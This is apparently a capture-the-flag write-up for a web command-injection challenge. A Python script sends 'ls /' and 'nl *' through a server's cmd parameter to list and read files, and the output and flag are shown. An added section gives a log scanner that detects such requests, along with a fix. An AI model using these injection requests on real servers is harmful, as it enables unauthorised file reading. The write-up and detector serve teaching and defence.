Tags: web command_injection python 

You can use the command `ls /` to list files and directories, and `nl *` to look for the flag string. Here is the Python code that solves this challenge.

```
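import requests

# List the root directory through the injectable cmd parameter
html = requests.get('http://207.180.200.166:8000/?cmd=ls /')
print(html.text.strip())

# Print the files matched by * with line numbers
html = requests.get('http://207.180.200.166:8000/?cmd=nl *')

# Iterating a string yields characters, so this drops all whitespace
text = ''
for ch in html.text:
    text += ch.strip()

# Slice out the flag from 'flag{' through the closing '}'
a = text.find('flag{')
b = text.find('}', a + 6) + 1
print(text[a:b])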
```

Here is the output of the Python code.

```
bin
dev
etc
flag.txt
home
lib
media
mnt
proc
root
run
sbin
srv
sys
tmp
usr
var
flag{ju57_g0tt@_5pl1t_Em3012}
```

You will get the flag.

```
flag{ju57_g0tt@_5pl1t_Em3012}
```
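
From the defender's side, the two requests above leave a recognizable trace in the web server's access log. The following is an added example, not part of the original writeup: it scans log lines for command-style query parameters. The log lines, the parameter names other than `cmd`, and the utility list are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in common log format (not taken from the challenge server).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /?cmd=ls%20/ HTTP/1.1" 200 87
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /?cmd=nl%20* HTTP/1.1" 200 412
198.51.100.4 - - [01/Jan/2024:10:00:05 +0000] "GET /index.html?page=2 HTTP/1.1" 200 1024
198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /search?q=nl+holidays HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*"')
# 'cmd' is the parameter from the writeup; the other names are assumptions.
SUSPECT_PARAMS = {"cmd", "command", "exec"}
# Utilities that list or print files, appearing at the start of a command.
UTILITY_RE = re.compile(r"(?:^|[\s;|&])(?:ls|nl|cat|head|tail|more|less|find)\b")
# Shell globs and metacharacters.
META_RE = re.compile(r"[*?;|&`$<>]")

def find_suspicious(log_text):
    """Return (ip, param, decoded value, reasons) for requests with two or more indicators."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        query = urlsplit(m.group("target")).query
        # parse_qs URL-decodes values, so %20 and + both become spaces
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                reasons = []
                if name.lower() in SUSPECT_PARAMS:
                    reasons.append("command-style parameter")
                if UTILITY_RE.search(value):
                    reasons.append("file utility")
                if META_RE.search(value):
                    reasons.append("shell metacharacter")
                # One indicator alone (e.g. q=nl holidays) is too noisy to report.
                if len(reasons) >= 2:
                    hits.append((m.group("ip"), name, value, reasons))
    return hits

if __name__ == "__main__":
    for ip, name, value, reasons in find_suspicious(SAMPLE_LOG):
        print(f"{ip} {name}={value!r}: {', '.join(reasons)}")
```

Detection only narrows the window. The fix on the server is to stop passing request parameters to a shell and to map a fixed set of allowed actions to fixed argument lists instead.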